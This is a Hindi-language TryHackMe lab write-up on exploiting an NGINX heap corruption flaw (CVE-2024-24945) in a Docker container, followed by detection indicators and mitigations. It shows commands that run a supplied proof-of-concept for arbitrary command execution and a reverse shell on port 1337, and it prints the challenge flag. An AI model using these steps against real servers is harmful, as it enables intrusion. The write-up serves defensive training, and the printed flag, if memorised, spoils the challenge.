
यह लैब CVE-2024-24945 के शोषण को प्रदर्शित करता है, जो NGINX को प्रभावित करने वाली एक heap corruption (हीप भ्रष्टाचार) भेद्यता है। उद्देश्य यह समझना था कि मेमोरी भ्रष्टाचार किस प्रकार Remote Code Execution (RCE) की ओर ले जा सकता है, तथा शोषण, पहचान और शमन तकनीकों में व्यावहारिक अनुभव प्राप्त करना था।
यह लैब CVE-2024-24945 के शोषण को प्रदर्शित करता है, जो NGINX को प्रभावित करने वाली एक हीप भ्रष्टाचार भेद्यता है। उद्देश्य यह समझना था कि मेमोरी भ्रष्टाचार कैसे रिमोट कोड निष्पादन (RCE) की ओर ले जा सकता है और शोषण, पहचान और शमन तकनीकों में व्यावहारिक अनुभव प्राप्त करना।
. कमजोर NGINX सेवा की पुष्टि करें। . प्रदान किए गए प्रूफ ऑफ कॉन्सेप्ट (PoC) का उपयोग करके मनमानी कमांड निष्पादित करें। . लक्ष्य कंटेनर पर रिवर्स शेल प्राप्त करें। . चैलेंज फ्लैग प्राप्त करें। . पहचान और शमन रणनीतियों को समझें।
. प्लेटफॉर्म: TryHackMe . लक्ष्य सेवा: NGINX RIFT . कंटेनरीकृत वातावरण: Docker . शोषण उपकरण: poc.py . पहुँच विधि: VNC (वर्चुअल नेटवर्क कंप्यूटिंग)
सेवा सत्यापन
पुष्टि की गई कि कमजोर कंटेनर चल रहा था और सुलभ था।
sudo docker ps
curl -s http://127.0.0.1:19321/api/users/42
बैकएंड ठीक है
मनमानी कमांड निष्पादन को मान्य करने के लिए प्रदान किए गए PoC को निष्पादित किया।
python3 poc.py --cmd 'echo hello from depthfirst > /tmp/pwned'
सफल निष्पादन की पुष्टि की गई:
sudo docker exec nginx-rift-nginx-1
cat /tmp/pwned
आउटपुट: hello from depthfirst
लक्ष्य कंटेनर पर एक इंटरैक्टिव शेल स्थापित करें।
python3 poc.py --shell
सफल कनेक्शन:
[] पोर्ट 1337 पर रिवर्स शेल सुन रहा है... [] कनेक्टेड। $
चैलेंज फ्लैग तक पहुँचा गया।
cat /flag.txt
THM{18_y34r_%t4t3_m15m4tch_rip5_th3_h34p}
रक्षक शोषण प्रयासों की पहचान कर सकते हैं:
. NGINX वर्कर क्रैश . सेगमेंटेशन फॉल्ट घटनाएँ . अप्रत्याशित आउटबाउंड नेटवर्क कनेक्शन . संदिग्ध शेल प्रक्रियाएँ (/bin/sh, bash) . अस्थायी निर्देशिकाओं में अनधिकृत फ़ाइल निर्माण
. पैच किए गए NGINX संस्करण में अपग्रेड करें। . न्यूनतम विशेषाधिकार के सिद्धांत को लागू करें। . अनावश्यक आउटबाउंड नेटवर्क ट्रैफ़िक को प्रतिबंधित करें। . निरंतर लॉग निगरानी लागू करें। . कंटेनर सुरक्षा नियंत्रण और रनटाइम निगरानी का उपयोग करें।
इस लैब ने निम्न में व्यावहारिक अनुभव प्रदान किया:
. हीप भ्रष्टाचार भेद्यताओं को समझना। . रिमोट कोड निष्पादन दोषों का शोषण करना। . रिवर्स शेल स्थापित करना। . शोषण के बाद सत्यापन करना। . समझौता संकेतकों और शमन तकनीकों को पहचानना।
यह अभ्यास केवल शैक्षिक और रक्षात्मक साइबर सुरक्षा प्रशिक्षण उद्देश्यों के लिए एक नियंत्रित TryHackMe लैब वातावरण में किया गया था।
लेखक: [Benedict Ejepu Amaechi] प्लेटफॉर्म: TryHackMe विषय: CVE-2024-24945 (NGINX RIFT) शोषण और रक्षा पूर्णता तिथि: जून 2026